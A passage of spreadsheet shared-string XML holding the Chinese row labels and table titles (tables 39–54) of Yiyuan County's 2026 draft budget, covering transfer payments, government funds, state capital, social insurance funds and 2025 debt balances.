  <si>
    <t>50401</t>
  </si>
  <si>
    <t>50402</t>
  </si>
  <si>
    <t>50403</t>
  </si>
  <si>
    <t>50404</t>
  </si>
  <si>
    <t>五、对事业单位经常性补助</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工资福利支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>商品和服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他对事业单位补助</t>
    </r>
  </si>
  <si>
    <t>六、对事业单位资本性补助</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资本性支出（一）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资本性支出（二）</t>
    </r>
  </si>
  <si>
    <t>507</t>
  </si>
  <si>
    <t>七、对企业补助</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>费用补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>利息补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他对企业补助</t>
    </r>
  </si>
  <si>
    <t>508</t>
  </si>
  <si>
    <t>八、对企业资本性支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资本金注入（一）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资本金注入（二）</t>
    </r>
  </si>
  <si>
    <t>509</t>
  </si>
  <si>
    <t>九、对个人和家庭的补助</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会福利和救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>助学金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>个人农业生产补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>离退休费</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他对个人和家庭补助</t>
    </r>
  </si>
  <si>
    <t>510</t>
  </si>
  <si>
    <t>十、对社会保障基金补助</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对社会保险基金补助</t>
    </r>
  </si>
  <si>
    <t>511</t>
  </si>
  <si>
    <t>十一、债务利息及费用支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国内债务付息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国内债务发行费用</t>
    </r>
  </si>
  <si>
    <t>514</t>
  </si>
  <si>
    <t>十二、预备费</t>
  </si>
  <si>
    <t>十二、其他支出</t>
  </si>
  <si>
    <t>表39</t>
  </si>
  <si>
    <t>2026年一般公共预算安排的税收返还
及一般性转移支付分项目草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>项</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 目</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>合</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、税收返还</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：所得税基数返还</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>成品油税费改革税收返还</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>增值税税收返还</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>消费税税收返还</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>增值税</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>五五分享</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>税收返还</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他税收返还</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、一般性转移支付</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>体制补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>均衡性转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>县级基本财力保障机制奖补资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>结算补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>企业事业单位划转补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>产粮（油）大县奖励资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重点生态功能区转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>固定数额补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>革命老区转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>巩固脱贫攻坚成果衔接乡村振兴转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公共安全共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教育共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科学技术共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化旅游体育与传媒共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会保障和就业共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医疗卫生共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医疗卫生共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>节能环保共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>节能环保共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农林水共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农林水共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交通运输共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交通运输共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">   粮油物资储备共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">   灾害防治及应急管理共同财政事权转移支付收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房保障共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房保障共同财政事权转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他一般性转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他一般性转移支付收入</t>
    </r>
  </si>
  <si>
    <t>表40</t>
  </si>
  <si>
    <t>2026年一般公共预算安排的专项转移支付分项目预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>项</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 目</t>
    </r>
  </si>
  <si>
    <t>合    计</t>
  </si>
  <si>
    <t>一、一般公共服务方面</t>
  </si>
  <si>
    <t>二、国防</t>
  </si>
  <si>
    <t>三、公共安全方面</t>
  </si>
  <si>
    <t>四、教育方面</t>
  </si>
  <si>
    <t>五、科学技术方面</t>
  </si>
  <si>
    <t>六、文化旅游体育与传媒方面</t>
  </si>
  <si>
    <t>七、社会保障和就业方面</t>
  </si>
  <si>
    <t>八、卫生健康方面</t>
  </si>
  <si>
    <t>九、节能环保方面</t>
  </si>
  <si>
    <t>十、城乡社区方面</t>
  </si>
  <si>
    <t>十一、农林水方面</t>
  </si>
  <si>
    <t>十二、交通运输方面</t>
  </si>
  <si>
    <t>十三、资源勘探工业信息等方面</t>
  </si>
  <si>
    <t>十四、商业服务业等方面</t>
  </si>
  <si>
    <t>十五、金融方面</t>
  </si>
  <si>
    <t>十六、自然资源海洋气象等方面</t>
  </si>
  <si>
    <t>十七、住房保障方面</t>
  </si>
  <si>
    <t>十八、粮油物资储备方面</t>
  </si>
  <si>
    <t>十九、灾害防治及应急管理方面</t>
  </si>
  <si>
    <t>二十、其他方面</t>
  </si>
  <si>
    <t>表41</t>
  </si>
  <si>
    <t>2026年县对下税收返还
及转移支付分地区预算表</t>
  </si>
  <si>
    <t>地     区</t>
  </si>
  <si>
    <t>税收返还</t>
  </si>
  <si>
    <t>专项转移支付</t>
  </si>
  <si>
    <t>未落实到地区数</t>
  </si>
  <si>
    <t>表42</t>
  </si>
  <si>
    <t>2026年沂源县对下转移支付分项目预算表</t>
  </si>
  <si>
    <t>体制补助收入</t>
  </si>
  <si>
    <t>其他一般性
转移支付收
入</t>
  </si>
  <si>
    <t>社会保障和就
业支出</t>
  </si>
  <si>
    <t>农林水支出</t>
  </si>
  <si>
    <t>表43</t>
  </si>
  <si>
    <t>2026年沂源县县级政府性基金预算收入草案表</t>
  </si>
  <si>
    <t>表44</t>
  </si>
  <si>
    <t>2026年沂源县县级政府性基金预算支出草案表</t>
  </si>
  <si>
    <t>一、文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t>地方政府专项债务还本支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府新增专项债券还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府再融资专项债券还本支出</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">    补助下级</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>调出资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年终累计结余</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>支出总计</t>
    </r>
  </si>
  <si>
    <t>表45</t>
  </si>
  <si>
    <t>2026年沂源县对下政府性基金转移支付
分项目预算表</t>
  </si>
  <si>
    <t>金   额</t>
  </si>
  <si>
    <t>一、国家电影事业发展专项资金</t>
  </si>
  <si>
    <t>二、旅游发展基金</t>
  </si>
  <si>
    <t>三、大中型水库移民后期扶持基金</t>
  </si>
  <si>
    <t>四、国有土地使用权出让收入及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>五、国家重大水利工程建设基金</t>
  </si>
  <si>
    <t>六、港口建设费安排的支出</t>
  </si>
  <si>
    <t>七、民航发展基金</t>
  </si>
  <si>
    <t>八、彩票公益金及彩票发行销售机构业务费安排的支出</t>
  </si>
  <si>
    <t>九、其他政府性基金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>表46</t>
  </si>
  <si>
    <t>2026年沂源县对下政府性基金转移支付
分地区预算表</t>
  </si>
  <si>
    <t>地  区</t>
  </si>
  <si>
    <t>表47</t>
  </si>
  <si>
    <t>2026年沂源县本级国有资本经营预算收入草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>本级本年收入合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>转移性收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上级补助收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>下级上解收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上年结余收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>收入总计</t>
    </r>
  </si>
  <si>
    <t>表48</t>
  </si>
  <si>
    <t>2026年沂源县本级国有资本经营预算支出草案表</t>
  </si>
  <si>
    <t>表49</t>
  </si>
  <si>
    <t>2026年沂源县对下国有资本经营预算转移支付
分项目分地区预算表</t>
  </si>
  <si>
    <t>表50</t>
  </si>
  <si>
    <t>2026年沂源县本级社会保险基金预算收入草案表</t>
  </si>
  <si>
    <t>表51</t>
  </si>
  <si>
    <t>2026年沂源县本级社会保险基金预算支出草案表</t>
  </si>
  <si>
    <t>表52</t>
  </si>
  <si>
    <t>2026年末沂源县本级社会保险基金预算结余预算表</t>
  </si>
  <si>
    <t>第五部分 
地方政府债务情况</t>
  </si>
  <si>
    <t>表53</t>
  </si>
  <si>
    <t>2025年沂源县地方政府债务限额余额情况表</t>
  </si>
  <si>
    <t>2024年政府债务余额</t>
  </si>
  <si>
    <t>2025年新增债务限额</t>
  </si>
  <si>
    <t>2025年政府债务限额</t>
  </si>
  <si>
    <t>2025年政府债务余额</t>
  </si>
  <si>
    <t>区县合计</t>
  </si>
  <si>
    <t>沂源县</t>
  </si>
  <si>
    <t>表54</t>
  </si>
  <si>
    <t>2025年沂源县地方政府一般债务余额情况表</t>
  </si>
  <si>
    <t>项   目</t>
  </si>
  <si>
    <t>一、2024年末地方政府一般债务余额实际数</t>
  </si>
  <si>
    <t>二、2025年末地方政府一般债务余额限额</t>
  </si>
  <si>
    <t>三、2025年地方政府一般债务发行额</t>
  </si>
  <si>
    <t xml:space="preserve">   中央转贷地方的国际金融组织和外国政府贷款</t>
  </si>
  <si>
    <t xml:space="preserve">   2025年地方政府一般债券发行额</t>
  </si>
  <si>
    <t>四、2025年地方政府一般债务还本额</t>
  </si>
  <si>
    <t>五、2025年末地方政府一般债务余额执行数</t>
  </si>
  <si>
    <t>备注：</t>
  </si>
  <si>
